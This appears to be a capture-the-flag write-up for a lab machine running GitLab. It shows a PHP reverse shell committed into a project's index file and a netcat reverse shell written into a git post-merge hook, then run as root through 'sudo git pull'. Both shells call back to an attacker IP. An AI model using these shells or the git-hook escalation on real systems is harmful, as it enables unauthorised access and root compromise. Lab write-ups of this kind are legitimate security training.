Beginning with a simple scan of the first 10000 ports
Nothing crazy. We see a web server, we go on the web. It is a gitlab server.
Normally I would run gobuster on it but I wanted to explore the site manually. On the bottom of the site, I clicked on the help link and another link showed up. That also lead to a list of links.
After login, we have two projects to explore. The Deployer project didn’t really spark me as the Profile project. The profile project seems to be the source code of the developer’s website. First thing I did was upload a php reverse shell at the bottom of index.html. Commit the changes and merge it to master
1 2 <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.32/1234 0>&1'");
[http://10.10.10.114/profile](http://10.10.10.114/profile) activates the shell
I like to see if my current user can run any command as root or another user. And for us, we can sudo git pull.
I have been working gitlab for a while now. I got to know about git hooks. Git hooks are basically scripts that can be executed depending on what git command you used. Some of them are post-merge, pre-commit and so much more. Take a look at this article and this one if you are interested in learning more about it. The exploit I used was similar to a project I was working on when learning about git. Here is the link to it.
For this box, I used post-merge for my attack. Post merge is executed after a git merge has been done.
Start by copying the
.git from the
/tmp/. Now we echo a netcat reverse shell into post-merge in
/tmp/.git. Next, we make a change to the README.md on the webserver and merge the changes. In your shell, do sudo git pull and that should give a root shell(make sure you are listening). This code snippet below is exactly what explained in words:
1 2 3 4 5 www-data@bitlab:/var/www/html/profile$ cp -R .git /tmp/ www-data@bitlab:/tmp$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.32 1337 >/tmp/f" > .git/hooks/post-merge www-data@bitlab:/tmp$ chmod 777 .git/hooks/post-merge **Make a change to README.md on the web** www-data@bitlab:/tmp$ sudo /usr/bin/git pull
Here’s our listener with a root shell.
Obviously this is an unintended way (jumping from www-data to root). I believe the intended way is to find some creds for the SQL database to get the user’ s password. And from there …(come back)